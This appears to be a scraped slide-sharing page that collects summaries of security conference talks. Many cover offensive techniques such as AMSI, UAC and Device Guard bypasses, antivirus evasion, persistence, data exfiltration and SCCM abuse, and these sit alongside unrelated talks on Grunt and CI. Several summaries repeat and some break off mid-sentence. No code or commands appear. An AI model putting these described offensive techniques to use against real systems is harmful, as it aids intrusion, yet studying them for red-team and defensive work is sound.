This talk speaks to Aggressor, which is a scripting language that comes with Cobalt Strike. We've created or captured other public scripts into a single repository that shows how aggressor, and automation, can be used in every part of a red team or pen test.
https://github.com/FortyNorthSecurity/AggressorAssessor
BlackHat USA 2019 - WMImplant: An Offensive Use Case of WMICTruncer
This slide deck was presented at BlackHat USA 2019 Arsenal and is titled WMImplant: An Offensive Use Case of WMI. This covers how WMImplant weaponizes WMI.
To generate an attack or anti-malware report from Deep Security Manager in PDF format, select the report type from the Single Report tab under Events and Reports, choose all tag filters and the desired time frame and computers, optionally add encryption, and click Generate.
The document discusses different types of bugs at various stages of development and production. It provides strategies for preventing bugs including writing unit tests, automating processes, monitoring systems, and working smarter by refactoring code and documenting assumptions. When bugs occur in production, it recommends gathering detailed bug reports, profiling code with Xdebug, tracing code execution, and potentially remote debugging to identify issues. However, remote debugging should only be used temporarily due to performance impacts and confidentiality concerns. The document concludes with a plug for the author's company which provides application development and monitoring services.
This document discusses techniques for hunting down target users on Windows domains after gaining initial access. It begins by outlining existing tools like psloggedon.exe and netsess.exe that can detect logged-in users but typically require administrator privileges. It then explores using domain data sources and PowerShell with tools like PowerView to profile and locate target users throughout the domain without administrator privileges. Various PowerShell commands like Invoke-UserHunter, Invoke-UserView, and Invoke-UserEventHunter are demonstrated for efficiently finding sessions and events associated with target users.
Matt Nelson, SpecterOps
A persistent "enlightened" attacker will invest the required resources to bypass any and all security features that might stand between them and their objective, regardless if these features are guaranteed to be serviced as security boundaries or not. This includes researching and developing attacks against Windows security features that may impose a hurdle in their attack chain. This talk will outline recent research into features such as User Account Control (UAC), the Antimalware Scan Interface (AMSI) and Device Guard and how these bypasses are useful to attackers in an operational context.
Some examples include:
UAC: If an attacker compromises a user that is running as a split-token administrator, bypassing UAC is required in order to perform any administrative actions; such as dumping credentials from memory.
AMSI: With in-memory attacks becoming more prevalent via scripting languages, AMSI is the next logical step to facilitate detection. An attacker will need to bypass AMSI in order to safely operate in memory when using PowerShell, VBScript, or JScript.
Device Guard: As organizations begin to consider whitelisting solutions, an attacker is required to adapt and develop a bypass to these technologies. One such solution is Device Guard, which can be used to heavily restrict what is allowed to execute on the system. In order to accomplish their objective, an attacker would need to bypass User Mode Code Integrity (UMCI). Such research can find novel ways to execute code in ways that are not likely to be detected.
I will also cover some of the fixes that have been implemented in newer versions of the Windows Operating System. Fixing these bypasses will not only make Windows safer, but it will begin to disrupt attackers by raising the cost associated with successfully executing an attack.
This document provides a summary of best practices for securing AWS environments. It discusses common issues like exposed credentials, misconfigured services, and vulnerable systems that can lead to account exploitation.
The document recommends implementing monitoring with AWS services like CloudWatch, CloudTrail and Config to detect threats. It also advises hardening AWS security by not using the root account, auditing IAM policies, enabling multi-factor authentication, using IAM roles instead of long-term access keys, and monitoring for unauthorized API access or root account usage. Specific techniques are demonstrated like creating a CloudWatch event rule to send unauthorized IAM events to Lambda for analysis.
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...enigma0x3
This document summarizes Matt Nelson's presentation on security boundaries and feature bypasses in Microsoft software. Some key points include:
- Security boundaries are not always clearly defined and what is/isn't a boundary can discourage researchers from reporting issues.
- Attackers don't care about boundaries and will exploit any feature or bypass that raises their chances of success.
- Examples of feature bypasses like Outlook forms, OLE, and UAC show how Microsoft has improved at issuing fixes for non-boundaries in the name of defense in depth.
- Technologies like AMSI, Device Guard, and UAC still have bypasses but increasing costs for attackers through fixes is worthwhile even if not a strict boundary.
- The call
BlackHat USA 2019 - WMImplant: An Offensive Use Case of WMICTruncer
This slide deck was presented at BlackHat USA 2019 Arsenal and is titled WMImplant: An Offensive Use Case of WMI. This covers how WMImplant weaponizes WMI.
To generate an attack or anti-malware report from Deep Security Manager in PDF format, select the report type from the Single Report tab under Events and Reports, choose all tag filters and the desired time frame and computers, optionally add encryption, and click Generate.
The document discusses different types of bugs at various stages of development and production. It provides strategies for preventing bugs including writing unit tests, automating processes, monitoring systems, and working smarter by refactoring code and documenting assumptions. When bugs occur in production, it recommends gathering detailed bug reports, profiling code with Xdebug, tracing code execution, and potentially remote debugging to identify issues. However, remote debugging should only be used temporarily due to performance impacts and confidentiality concerns. The document concludes with a plug for the author's company which provides application development and monitoring services.
This document discusses techniques for hunting down target users on Windows domains after gaining initial access. It begins by outlining existing tools like psloggedon.exe and netsess.exe that can detect logged-in users but typically require administrator privileges. It then explores using domain data sources and PowerShell with tools like PowerView to profile and locate target users throughout the domain without administrator privileges. Various PowerShell commands like Invoke-UserHunter, Invoke-UserView, and Invoke-UserEventHunter are demonstrated for efficiently finding sessions and events associated with target users.
Matt Nelson, SpecterOps
A persistent "enlightened" attacker will invest the required resources to bypass any and all security features that might stand between them and their objective, regardless if these features are guaranteed to be serviced as security boundaries or not. This includes researching and developing attacks against Windows security features that may impose a hurdle in their attack chain. This talk will outline recent research into features such as User Account Control (UAC), the Antimalware Scan Interface (AMSI) and Device Guard and how these bypasses are useful to attackers in an operational context.
Some examples include:
UAC: If an attacker compromises a user that is running as a split-token administrator, bypassing UAC is required in order to perform any administrative actions; such as dumping credentials from memory.
AMSI: With in-memory attacks becoming more prevalent via scripting languages, AMSI is the next logical step to facilitate detection. An attacker will need to bypass AMSI in order to safely operate in memory when using PowerShell, VBScript, or JScript.
Device Guard: As organizations begin to consider whitelisting solutions, an attacker is required to adapt and develop a bypass to these technologies. One such solution is Device Guard, which can be used to heavily restrict what is allowed to execute on the system. In order to accomplish their objective, an attacker would need to bypass User Mode Code Integrity (UMCI). Such research can find novel ways to execute code in ways that are not likely to be detected.
I will also cover some of the fixes that have been implemented in newer versions of the Windows Operating System. Fixing these bypasses will not only make Windows safer, but it will begin to disrupt attackers by raising the cost associated with successfully executing an attack.
This document provides a summary of best practices for securing AWS environments. It discusses common issues like exposed credentials, misconfigured services, and vulnerable systems that can lead to account exploitation.
The document recommends implementing monitoring with AWS services like CloudWatch, CloudTrail and Config to detect threats. It also advises hardening AWS security by not using the root account, auditing IAM policies, enabling multi-factor authentication, using IAM roles instead of long-term access keys, and monitoring for unauthorized API access or root account usage. Specific techniques are demonstrated like creating a CloudWatch event rule to send unauthorized IAM events to Lambda for analysis.
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...enigma0x3
This document summarizes Matt Nelson's presentation on security boundaries and feature bypasses in Microsoft software. Some key points include:
- Security boundaries are not always clearly defined and what is/isn't a boundary can discourage researchers from reporting issues.
- Attackers don't care about boundaries and will exploit any feature or bypass that raises their chances of success.
- Examples of feature bypasses like Outlook forms, OLE, and UAC show how Microsoft has improved at issuing fixes for non-boundaries in the name of defense in depth.
- Technologies like AMSI, Device Guard, and UAC still have bypasses but increasing costs for attackers through fixes is worthwhile even if not a strict boundary.
- The call
This document discusses hacking serverless runtime environments like AWS Lambda, Azure Functions, and Auth0 WebTask. It begins by introducing the presenters and what will be covered. The document then explores how different vendors implement sandbox isolation and common attack techniques like persistence and data exfiltration. It examines specific runtimes like AWS Lambda in depth, investigating how to profile the environment, persist code, and escalate privileges. The document emphasizes that detection is difficult in serverless environments and provides examples of potential indicators of compromise. Overall, the document provides an overview of attacking and defending serverless architectures.
The Supporting Role of Antivirus Evasion while PersistingCTruncer
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
This document introduces Grunt, an open source task automation tool built on Node.js that helps manage tasks like compiling code, running tests, building packages and more. It discusses how Grunt uses plugins to extend its functionality, manages dependencies, and allows automating and standardizing common development workflows through a Gruntfile and package.json. The document provides examples of popular Grunt plugins and demonstrates how to set up a sample Grunt project from scratch.
Adversarial Post-Ex: Lessons From The ProsJustin Warner
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to model realistic adversary behavior to improve defensive capabilities.
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to realistically emulate adversaries for red team assessments.
Up is Down, Black is White: Using SCCM for Wrong and Rightenigma0x3
This document discusses using Microsoft's System Center Configuration Manager (SCCM) for both offensive and defensive purposes. It introduces PowerSCCM, a PowerShell toolkit for interacting with SCCM. PowerSCCM can be used to create malicious applications and deploy them to targeted collections of machines. It also provides cmdlets for hunting for compromised users and systems. The document recommends tuning SCCM for improved host-based security monitoring and inventory capabilities. It provides examples of using SCCM data for incident response and hunting activities on the network.
XP Days 2019: First secret delivery for modern cloud-native applicationsVlad Fedosov
In this talk we’ll see how Authentication and Secrets delivery work in distributed containerized applications from the inside. We’ll start from the theory of security and will go through the topics like Container Auth Role, Static & Dynamic secrets, Env vars/volumes for secret delivery, Vault & K8S secrets. After this talk you’ll get an understanding how to securely deploy your containerized workloads.
Continuous Integration using Cruise Controlelliando dias
The document discusses Continuous Integration using Cruise Control. It defines Continuous Integration as integrating source code and running tests after each commit to the source repository to provide near-immediate feedback. Cruise Control runs builds whenever code is committed, allows scheduling nightly builds, and notifies users of build results to simplify release management. While Cruise Control automates the build process, developers must still write the build scripts and unit tests.
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...CODE BLUE
The Cyber Grand Challenge (CGC) was announced in 2013--a first-of-its-kind competition in which fully autonomous systems would compete in a Capture The Flag (CTF) tournament. Starting from over 100 teams consisting of some of the top security researchers and hackers in the world, only 7 teams qualified to the final round. These 7 teams competed against eachother to guard their own software with IDS rules and software patches while attacking the other systems. All of this was done without access to program source code nor access to humans.
This never-before-seen level of autonomy demonstrated the state of the art in areas of computer security including static analysis, automated bug finding, automatic exploit generation, and automatic software patching. Over the course of just 10 hours, these systems competed to analyze over 80 totally new pieces of software, showing capabilities beyond what anyone has ever seen before.
In this talk we will discuss the Cyber Grand Challenge, explaining what it entailed, what the results mean, and how these advances will influence software security in the near future. Additionally, we will share lessons learned from the winning CGC team, and take a look at the future of automatic software analysis.
--- Tyler Nighswander
Tyler has been a computer hacker for several years. While an undergraduate student at Carnegie Mellon University, Tyler was one of the initial members of the hacking team known as the Plaid Parliament of Pwning. This team rose from a small group of students to the number one competitive hacking team in the world. After traveling around the world competing in hacking competitions, Tyler settled down and now works on making humans and computers think more like hackers at ForAllSecure. In 2016, the automated system he helped create won the DARPA Cyber Grand Challenge.
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsYevgeniy Brikman
"All happy cloud deployments are alike; each unhappy cloud deployment is unhappy in its own way." — Leo Tolstoy, Site Reliability Engineer
At Gruntwork, I've had the chance to see the cloud adoption journeys of hundreds of companies, from tiny startups to Fortune 50 giants. I've seen those journeys go well. I've seen those journeys go poorly. In this talk, I discuss a few of the ways cloud adoption can go horribly wrong (massive cost overruns, endless death marches, security disasters), and more importantly, how you can get it right.
To help you get it right, we looked at the cloud journeys that were successful and extracted from them the patterns they had in common. We distilled all this experience down into something called the Gruntwork Production Framework, which defines five concrete steps you can follow to adopt the cloud at your own company—and hopefully, to end up with your very own happy cloud deployment.
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...apidays
apidays LIVE New York - API for Legacy Industries: Banking, Insurance, Healthcare and Retail
Navigating the Sea of Javascript Tools to Discover Scalable Tools for Continuous Delivery
Menelaos Kotsollaris, Senior Software Engineer
Viki Green, Senior Software Developer at Trulioo
This document provides an introduction and overview of GruntJS, including:
- What GruntJS is and why it is useful for JavaScript projects
- How to set up GruntJS and install its dependencies
- An explanation of basic GruntJS concepts like tasks, configuration, and plugins
- Examples of creating simple GruntJS tasks and using features like warnings, logs, and asynchronous calls
- A discussion of common files and operations in GruntJS like reading, writing, copying, and deleting files
The document serves as a tutorial for getting started with GruntJS and demonstrates some of its core capabilities.
Ever Present Persistence - Established Footholds Seen in the WildCTruncer
This talk is about different attacker persistence techniques that we have seen in the wild, or published by other companies. We wanted to create a massive document containing all of these techniques with a mile wide, inch deep approach. Our goal is to give a description of how each technique works and a way to detect them to allow anyone to start looking for these specific techniques.
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
SEC303 Automating Security in cloud Workloads with DevSecOpsAmazon Web Services
This session is designed to teach security engineers, developers, solutions architects, and other technical security practitioners how to use a DevSecOps approach to design and build robust security controls at cloud-scale. This session walks through the design considerations of operating high-assurance workloads on top of the AWS platform and provides examples of how to automate configuration management and generate audit evidence for your own workloads. We’ll discuss practical examples using real code for automating security tasks, then dive deeper to map the configurations against various industry frameworks. This advanced session showcases how continuous integration and deployment pipelines can accelerate the speed of security teams and improve collaboration with software development teams.
At Fluent Conference 2018, Nic Jansma and Charles Vazac perform an honest audit of several popular third-party libraries to understand their true cost to your site, exploring loading patterns, SPOF avoidance, JavaScript parsing, long tasks, runtime overhead, polyfill headaches, security and privacy concerns, and more. They also share tools to help you decide if a library’s risks and unseen costs are worth it.
When Third Parties Stop Being Polite... and Start Getting RealNicholas Jansma
By Nic Jansma and Charlie Vazac (Akamai)
Fluent 2018
Would you give the Amazon Prime delivery robot the key to your house, just because it stops by to deliver delicious packages every day? Even if you would, do you still have 100% confidence that it wouldn’t accidentally drag in some mud, let the neighbor in, steal your things, or burn your house down? Worst-case scenarios such as these are what you should be planning for when deciding whether or not to include third-party libraries and services on your website. While most libraries have good intentions, by including them on your site, you have given them complete control over the kingdom. Once on your site, they can provide all of the great services you want—or they can destroy everything you’ve worked so hard to build.
It’s prudent to be cautious: we’ve all heard stories about how third-party libraries have caused slowdowns, broken websites, and even led to downtime. But how do you evaluate the actual costs and potential risks of a third-party library so you can balance that against the service it provides? Every library requires nonzero overhead to provide the service it claims. In many cases, the overhead is minimal and justified, but we should quantify it to understand the real cost. In addition, libraries need to be carefully crafted so they can avoid causing additional pain when the stars don’t align and things go wrong.
Nic Jansma and Charles Vazac perform an honest audit of several popular third-party libraries to understand their true cost to your site, exploring loading patterns, SPOF avoidance, JavaScript parsing, long tasks, runtime overhead, polyfill headaches, security and privacy concerns, and more. From how the library is loaded, to the moment it phones home, you’ll see how third-parties can affect the host page and discover best practices you can follow to ensure they do the least potential harm.
With all of the great performance tools available to developers today, we’ve gained a lot of insight into just how much third-party libraries are impacting our websites. Nic and Charles detail tools to help you decide if a library’s risks and unseen costs are worth it. While you may not have the time to perform a deep dive into every third-party library you want to include on your site, you’ll leave with a checklist of the most important best practices third-parties should be following for you to have confidence in them.
Worse Is Better, for Better or for WorseKevlin Henney
Presented at GeeCON (15th May 2014)
Over two decades ago, Richard Gabriel proposed the idea of “Worse Is Better” to explain why some things that are designed to be pure and perfect are eclipsed by solutions that are seemingly compromised and imperfect. This is not simply the observation that things should be better but are not, or that flawed and ill-considered solutions are superior to those created with intention, but that many solutions that are narrow and incomplete work out better than the solutions conceived of as being comprehensive and complete. Whether it is programming languages, operating systems, development processes or development practices, we find many examples of this in software development, some more provocative and surprising than others.
In this talk we revisit the original premise and question, and look at how this approach to development can still teach us something surprising and new.
Presentation at BSides Iowa 2018 discussing the background of Windows COM, red team value of Windows COM, and how blue teams can also use this knowledge.
You only have to change on thing to do the DevOps, everythingKen Mugrage
In this talk I point out several areas of focus when making the transition to a DevOps culture, and point out why it’s important that you change everything.
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000CTruncer
This document summarizes a talk about improvements to endpoint security in Windows 10 and how attackers have adapted. It discusses defenses like Device Guard and code integrity policies, as well as WMImplant, a tool developed by the presenters to operate on Device Guard systems using only Windows Management Instrumentation (WMI). WMImplant allows tasks like command execution, file transfer, and persistence via encoding and storing data in WMI properties. It also outlines methods defenders can use to detect malicious WMI usage like active WMI monitoring and the WMIMonitor tool.
This is the talk given at NullCon 2017. This talk give s history of the Veil Framework, and showcases the differences between 2.0 and the newly released 3.0. Veil 3.0 is released in this talk
More Related Content
Similar to Aggressive Autonomous Actions - Operating with Automation
This document discusses hacking serverless runtime environments like AWS Lambda, Azure Functions, and Auth0 WebTask. It begins by introducing the presenters and what will be covered. The document then explores how different vendors implement sandbox isolation and common attack techniques like persistence and data exfiltration. It examines specific runtimes like AWS Lambda in depth, investigating how to profile the environment, persist code, and escalate privileges. The document emphasizes that detection is difficult in serverless environments and provides examples of potential indicators of compromise. Overall, the document provides an overview of attacking and defending serverless architectures.
The Supporting Role of Antivirus Evasion while PersistingCTruncer
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
This document introduces Grunt, an open source task automation tool built on Node.js that helps manage tasks like compiling code, running tests, building packages and more. It discusses how Grunt uses plugins to extend its functionality, manages dependencies, and allows automating and standardizing common development workflows through a Gruntfile and package.json. The document provides examples of popular Grunt plugins and demonstrates how to set up a sample Grunt project from scratch.
Adversarial Post-Ex: Lessons From The ProsJustin Warner
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to model realistic adversary behavior to improve defensive capabilities.
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to realistically emulate adversaries for red team assessments.
Up is Down, Black is White: Using SCCM for Wrong and Rightenigma0x3
This document discusses using Microsoft's System Center Configuration Manager (SCCM) for both offensive and defensive purposes. It introduces PowerSCCM, a PowerShell toolkit for interacting with SCCM. PowerSCCM can be used to create malicious applications and deploy them to targeted collections of machines. It also provides cmdlets for hunting for compromised users and systems. The document recommends tuning SCCM for improved host-based security monitoring and inventory capabilities. It provides examples of using SCCM data for incident response and hunting activities on the network.
XP Days 2019: First secret delivery for modern cloud-native applicationsVlad Fedosov
In this talk we’ll see how Authentication and Secrets delivery work in distributed containerized applications from the inside. We’ll start from the theory of security and will go through the topics like Container Auth Role, Static & Dynamic secrets, Env vars/volumes for secret delivery, Vault & K8S secrets. After this talk you’ll get an understanding how to securely deploy your containerized workloads.
Continuous Integration using Cruise Controlelliando dias
The document discusses Continuous Integration using Cruise Control. It defines Continuous Integration as integrating source code and running tests after each commit to the source repository to provide near-immediate feedback. Cruise Control runs builds whenever code is committed, allows scheduling nightly builds, and notifies users of build results to simplify release management. While Cruise Control automates the build process, developers must still write the build scripts and unit tests.
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...CODE BLUE
The Cyber Grand Challenge (CGC) was announced in 2013--a first-of-its-kind competition in which fully autonomous systems would compete in a Capture The Flag (CTF) tournament. Starting from over 100 teams consisting of some of the top security researchers and hackers in the world, only 7 teams qualified to the final round. These 7 teams competed against eachother to guard their own software with IDS rules and software patches while attacking the other systems. All of this was done without access to program source code nor access to humans.
This never-before-seen level of autonomy demonstrated the state of the art in areas of computer security including static analysis, automated bug finding, automatic exploit generation, and automatic software patching. Over the course of just 10 hours, these systems competed to analyze over 80 totally new pieces of software, showing capabilities beyond what anyone has ever seen before.
In this talk we will discuss the Cyber Grand Challenge, explaining what it entailed, what the results mean, and how these advances will influence software security in the near future. Additionally, we will share lessons learned from the winning CGC team, and take a look at the future of automatic software analysis.
--- Tyler Nighswander
Tyler has been a computer hacker for several years. While an undergraduate student at Carnegie Mellon University, Tyler was one of the initial members of the hacking team known as the Plaid Parliament of Pwning. This team rose from a small group of students to the number one competitive hacking team in the world. After traveling around the world competing in hacking competitions, Tyler settled down and now works on making humans and computers think more like hackers at ForAllSecure. In 2016, the automated system he helped create won the DARPA Cyber Grand Challenge.
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsYevgeniy Brikman
"All happy cloud deployments are alike; each unhappy cloud deployment is unhappy in its own way." — Leo Tolstoy, Site Reliability Engineer
At Gruntwork, I've had the chance to see the cloud adoption journeys of hundreds of companies, from tiny startups to Fortune 50 giants. I've seen those journeys go well. I've seen those journeys go poorly. In this talk, I discuss a few of the ways cloud adoption can go horribly wrong (massive cost overruns, endless death marches, security disasters), and more importantly, how you can get it right.
To help you get it right, we looked at the cloud journeys that were successful and extracted from them the patterns they had in common. We distilled all this experience down into something called the Gruntwork Production Framework, which defines five concrete steps you can follow to adopt the cloud at your own company—and hopefully, to end up with your very own happy cloud deployment.
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...apidays
apidays LIVE New York - API for Legacy Industries: Banking, Insurance, Healthcare and Retail
Navigating the Sea of Javascript Tools to Discover Scalable Tools for Continuous Delivery
Menelaos Kotsollaris, Senior Software Engineer
Viki Green, Senior Software Developer at Trulioo
This document provides an introduction and overview of GruntJS, including:
- What GruntJS is and why it is useful for JavaScript projects
- How to set up GruntJS and install its dependencies
- An explanation of basic GruntJS concepts like tasks, configuration, and plugins
- Examples of creating simple GruntJS tasks and using features like warnings, logs, and asynchronous calls
- A discussion of common files and operations in GruntJS like reading, writing, copying, and deleting files
The document serves as a tutorial for getting started with GruntJS and demonstrates some of its core capabilities.
Ever Present Persistence - Established Footholds Seen in the WildCTruncer
This talk is about different attacker persistence techniques that we have seen in the wild, or published by other companies. We wanted to create a massive document containing all of these techniques with a mile wide, inch deep approach. Our goal is to give a description of how each technique works and a way to detect them to allow anyone to start looking for these specific techniques.
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
SEC303 Automating Security in cloud Workloads with DevSecOpsAmazon Web Services
This session is designed to teach security engineers, developers, solutions architects, and other technical security practitioners how to use a DevSecOps approach to design and build robust security controls at cloud-scale. This session walks through the design considerations of operating high-assurance workloads on top of the AWS platform and provides examples of how to automate configuration management and generate audit evidence for your own workloads. We’ll discuss practical examples using real code for automating security tasks, then dive deeper to map the configurations against various industry frameworks. This advanced session showcases how continuous integration and deployment pipelines can accelerate the speed of security teams and improve collaboration with software development teams.
At Fluent Conference 2018, Nic Jansma and Charles Vazac perform an honest audit of several popular third-party libraries to understand their true cost to your site, exploring loading patterns, SPOF avoidance, JavaScript parsing, long tasks, runtime overhead, polyfill headaches, security and privacy concerns, and more. They also share tools to help you decide if a library’s risks and unseen costs are worth it.
When Third Parties Stop Being Polite... and Start Getting RealNicholas Jansma
By Nic Jansma and Charlie Vazac (Akamai)
Fluent 2018
Would you give the Amazon Prime delivery robot the key to your house, just because it stops by to deliver delicious packages every day? Even if you would, do you still have 100% confidence that it wouldn’t accidentally drag in some mud, let the neighbor in, steal your things, or burn your house down? Worst-case scenarios such as these are what you should be planning for when deciding whether or not to include third-party libraries and services on your website. While most libraries have good intentions, by including them on your site, you have given them complete control over the kingdom. Once on your site, they can provide all of the great services you want—or they can destroy everything you’ve worked so hard to build.
It’s prudent to be cautious: we’ve all heard stories about how third-party libraries have caused slowdowns, broken websites, and even led to downtime. But how do you evaluate the actual costs and potential risks of a third-party library so you can balance that against the service it provides? Every library requires nonzero overhead to provide the service it claims. In many cases, the overhead is minimal and justified, but we should quantify it to understand the real cost. In addition, libraries need to be carefully crafted so they can avoid causing additional pain when the stars don’t align and things go wrong.
Nic Jansma and Charles Vazac perform an honest audit of several popular third-party libraries to understand their true cost to your site, exploring loading patterns, SPOF avoidance, JavaScript parsing, long tasks, runtime overhead, polyfill headaches, security and privacy concerns, and more. From how the library is loaded, to the moment it phones home, you’ll see how third-parties can affect the host page and discover best practices you can follow to ensure they do the least potential harm.
With all of the great performance tools available to developers today, we’ve gained a lot of insight into just how much third-party libraries are impacting our websites. Nic and Charles detail tools to help you decide if a library’s risks and unseen costs are worth it. While you may not have the time to perform a deep dive into every third-party library you want to include on your site, you’ll leave with a checklist of the most important best practices third-parties should be following for you to have confidence in them.
Worse Is Better, for Better or for WorseKevlin Henney
Presented at GeeCON (15th May 2014)
Over two decades ago, Richard Gabriel proposed the idea of “Worse Is Better” to explain why some things that are designed to be pure and perfect are eclipsed by solutions that are seemingly compromised and imperfect. This is not simply the observation that things should be better but are not, or that flawed and ill-considered solutions are superior to those created with intention, but that many solutions that are narrow and incomplete work out better than the solutions conceived of as being comprehensive and complete. Whether it is programming languages, operating systems, development processes or development practices, we find many examples of this in software development, some more provocative and surprising than others.
In this talk we revisit the original premise and question, and look at how this approach to development can still teach us something surprising and new.
Presentation at BSides Iowa 2018 discussing the background of Windows COM, red team value of Windows COM, and how blue teams can also use this knowledge.
You only have to change on thing to do the DevOps, everythingKen Mugrage
In this talk I point out several areas of focus when making the transition to a DevOps culture, and point out why it’s important that you change everything.
Similar to Aggressive Autonomous Actions - Operating with Automation (20)
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000CTruncer
This document summarizes a talk about improvements to endpoint security in Windows 10 and how attackers have adapted. It discusses defenses like Device Guard and code integrity policies, as well as WMImplant, a tool developed by the presenters to operate on Device Guard systems using only Windows Management Instrumentation (WMI). WMImplant allows tasks like command execution, file transfer, and persistence via encoding and storing data in WMI properties. It also outlines methods defenders can use to detect malicious WMI usage like active WMI monitoring and the WMIMonitor tool.
This is the talk given at NullCon 2017. This talk give s history of the Veil Framework, and showcases the differences between 2.0 and the newly released 3.0. Veil 3.0 is released in this talk
Bringing Down the House - How One Python Script Ruled Over AntiVirusCTruncer
This talk is about how a single python tool (Veil aka Veil-Evasion) is able to render AntiVirus useless. Veil's goal is to bypass antivirus products on workstations and servers.
A Battle Against the Industry - Beating Antivirus for Meterpreter and MoreCTruncer
This talk goes over how stagers work in a different manner. Rather than standard function calls, I show how to utilize the same functionality in a slightly different way. It talks about Veil-Evasion, and a signature that was developed for it. Finally, I get into custom code and showcase three pieces of custom code that completely bypass antivirus.
This talk goes over the art of antivirus evasion, or really the lack thereof. I talk about a new module that's getting added into Veil-Evasion, a signature that was developed for Veil, and creating your own processes for approaching unknowns.
This talk is about developing malware in higher level languages. Languages such as Python or C# can give you the flexibility to quickly develop malware and use it on client engagements.
This is the slide deck that I used when presenting at FSU's Cyber Security Club. This presentation was supposed to give a description of what Red Teaming, Pen Testing, and other roles do.
This is the slide deck I gave when presenting at FSU's AITP Meeting. The goal was to give a high level description of what Pen Testing/Red Teaming is and what the job entails.
This document summarizes the EyeWitness tool for automated network discovery and host identification. It discusses the typical assessment lifecycle, initial discovery and recon steps using Nmap and Nessus, and the need to automate analysis of large lists of web servers. The development of EyeWitness is described, from an initial proof of concept to version 2.0, which improved modularity, added protocol support, signature-based categorization and the ability to resume incomplete scans. Future work may include additional modules, protocols, and optical character recognition.
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationCTruncer
This presentation documents how Egress-Assess can be used on assessments to simulate exfiltrating data over a variety of protocols.
Additionally, this presentation documents the addition of malware modules into Egress-Assess. The new malware modules allow users to emulate different pieces of malware families by using documented malware indicators.
This presentation was given to a group of SFS students at GW. It's designed to be semi-case study driven on the problems I've encountered on assessments and how programming can help solve them.
Egress-Assess and Owning Data ExfiltrationCTruncer
This talk discusses how Egress-Assess can be used to help attackers and defenders learn how to exfiltrate data outside of their network over a variety of protocols, describes how data is exfiltrated over different supported protocols, and demonstrates the weaponization of the tool!
This talk is about why I believe having the ability to write tools and/or scripts can help elevate a Pen Testers game to the next level.
The talk is case study driven by the different scenarios I've encountered on assessments and the scripts or tools that have been developed as a result.
EyeWitness - A Web Application Triage ToolCTruncer
EyeWitness is a web application triage tool. It's designed to take a file from the user containing web pages, gather server header information, take a screenshot of the web page, and then organize all the information in a report. Additionally, EyeWitness will warn you about invalid SSL certificates, and attempt to identify any default credentials that may apply to the website.
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIVladimir Iglovikov, Ph.D.
Presented by Vladimir Iglovikov:
- https://www.linkedin.com/in/iglovikov/
- https://x.com/viglovikov
- https://www.instagram.com/ternaus/
This presentation delves into the journey of Albumentations.ai, a highly successful open-source library for data augmentation.
Created out of a necessity for superior performance in Kaggle competitions, Albumentations has grown to become a widely used tool among data scientists and machine learning practitioners.
This case study covers various aspects, including:
People: The contributors and community that have supported Albumentations.
Metrics: The success indicators such as downloads, daily active users, GitHub stars, and financial contributions.
Challenges: The hurdles in monetizing open-source projects and measuring user engagement.
Development Practices: Best practices for creating, maintaining, and scaling open-source libraries, including code hygiene, CI/CD, and fast iteration.
Community Building: Strategies for making adoption easy, iterating quickly, and fostering a vibrant, engaged community.
Marketing: Both online and offline marketing tactics, focusing on real, impactful interactions and collaborations.
Mental Health: Maintaining balance and not feeling pressured by user demands.
Key insights include the importance of automation, making the adoption process seamless, and leveraging offline interactions for marketing. The presentation also emphasizes the need for continuous small improvements and building a friendly, inclusive community that contributes to the project's growth.
Vladimir Iglovikov brings his extensive experience as a Kaggle Grandmaster, ex-Staff ML Engineer at Lyft, sharing valuable lessons and practical advice for anyone looking to enhance the adoption of their open-source projects.
Explore more about Albumentations and join the community at:
GitHub: https://github.com/albumentations-team/albumentations
Website: https://albumentations.ai/
LinkedIn: https://www.linkedin.com/company/100504475
Twitter: https://x.com/albumentations
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofsAlex Pruden
